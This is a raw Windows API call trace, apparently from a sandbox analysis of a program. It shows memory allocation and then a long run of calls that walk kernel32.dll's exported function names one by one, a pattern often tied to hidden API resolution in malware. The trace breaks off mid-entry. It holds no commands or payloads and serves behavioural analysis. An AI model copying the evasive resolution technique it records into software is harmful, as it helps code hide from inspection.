62 [0080.151] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0080.152] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0080.152] lstrlenA (lpString="kernel32.dll") returned 12 [0080.152] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0080.152] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0080.152] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0080.152] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0080.152] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0080.152] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0080.152] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0080.152] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0080.152] lstrlenA (lpString="ADDATOMA") returned 8 [0080.152] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0080.152] lstrlenA (lpString="ADDATOMW") returned 8 [0080.152] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0080.152] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0080.152] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0080.152] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0080.152] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0080.153] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0080.153] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0080.153] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0080.153] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0080.153] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0080.153] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0080.153] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0080.153] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0080.153] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0080.153] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0080.153] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0080.153] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0080.153] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0080.153] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0080.153] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0080.153] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0080.153] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0080.153] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0080.153] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0080.153] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0080.153] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0080.153] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0080.153] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0080.153] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0080.153] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0080.153] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0080.153] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0080.153] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0080.153] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0080.153] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0080.153] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0080.153] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0080.153] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0080.153] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0080.153] lstrlenA (lpString="BACKUPREAD") returned 10 [0080.153] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0080.154] lstrlenA (lpString="BACKUPSEEK") returned 10 [0080.154] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0080.154] lstrlenA (lpString="BACKUPWRITE") returned 11 [0080.154] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0080.154] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0080.154] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0080.154] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0080.154] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0080.154] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0080.154] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0080.154] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0080.154] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0080.154] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0080.154] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0080.154] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0080.154] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0080.154] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0080.154] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0080.154] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0080.154] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0080.154] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0080.154] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0080.154] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0080.154] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0080.154] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0080.154] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0080.154] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0080.154] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0080.154] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0080.154] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0080.154] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0080.154] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0080.154] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0080.154] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0080.154] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0080.154] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0080.154] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0080.155] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0080.155] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0080.155] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0080.155] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0080.155] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0080.155] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0080.155] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0080.155] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0080.155] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0080.155] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0080.155] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0080.155] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0080.155] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0080.155] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0080.155] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0080.155] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0080.155] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0080.155] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0080.155] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0080.155] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0080.155] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0080.155] lstrlenA (lpString="BEEP") returned 4 [0080.155] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0080.155] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0080.155] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0080.155] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0080.155] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0080.155] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0080.168] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0080.168] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0080.168] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0080.168] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0080.168] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0080.168] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0080.168] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0080.168] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0080.168] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0080.168] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0080.168] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0080.168] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0080.168] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0080.168] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0080.168] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0080.168] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0080.168] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0080.168] lstrlenA (lpString="CANCELIO") returned 8 [0080.168] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0080.168] lstrlenA (lpString="CANCELIOEX") returned 10 [0080.168] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0080.168] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0080.168] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0080.168] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0080.168] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0080.168] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0080.168] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0080.168] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0080.168] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0080.168] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0080.168] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0080.168] lstrlenA (lpString="CHECKELEVATION") returned 14 [0080.168] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0080.169] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0080.169] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0080.169] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0080.169] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0080.169] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0080.169] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0080.169] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0080.169] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0080.169] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0080.169] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0080.169] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0080.169] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0080.169] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0080.169] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0080.169] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0080.169] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0080.169] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0080.169] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0080.169] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0080.169] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0080.169] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0080.169] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0080.169] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0080.169] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0080.169] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0080.169] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0080.169] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0080.169] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0080.169] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0080.169] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0080.169] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0080.169] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0080.169] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0080.169] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0080.169] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0080.169] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0080.169] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0080.169] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0080.170] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0080.170] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0080.170] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0080.170] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0080.170] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0080.170] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0080.170] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0080.170] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0080.170] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0080.170] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0080.170] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0080.170] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0080.170] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0080.170] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0080.170] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0080.170] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0080.170] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0080.170] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0080.170] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0080.170] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0080.170] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0080.170] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0080.170] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0080.170] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0080.170] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0080.170] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0080.170] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0080.170] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0080.170] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0080.170] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0080.170] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0080.170] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0080.170] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0080.170] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0080.170] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0080.170] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0080.170] lstrlenA (lpString="COPYCONTEXT") returned 11 [0080.171] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0080.171] lstrlenA (lpString="COPYFILEA") returned 9 [0080.171] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0080.171] lstrlenA (lpString="COPYFILEEXA") returned 11 [0080.171] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0080.171] lstrlenA (lpString="COPYFILEEXW") returned 11 [0080.171] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0080.171] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0080.171] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0080.171] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0080.171] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0080.171] lstrlenA (lpString="COPYFILEW") returned 9 [0080.171] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0080.171] lstrlenA (lpString="COPYLZFILE") returned 10 [0080.171] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0080.171] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0080.171] lstrcpyA (in: 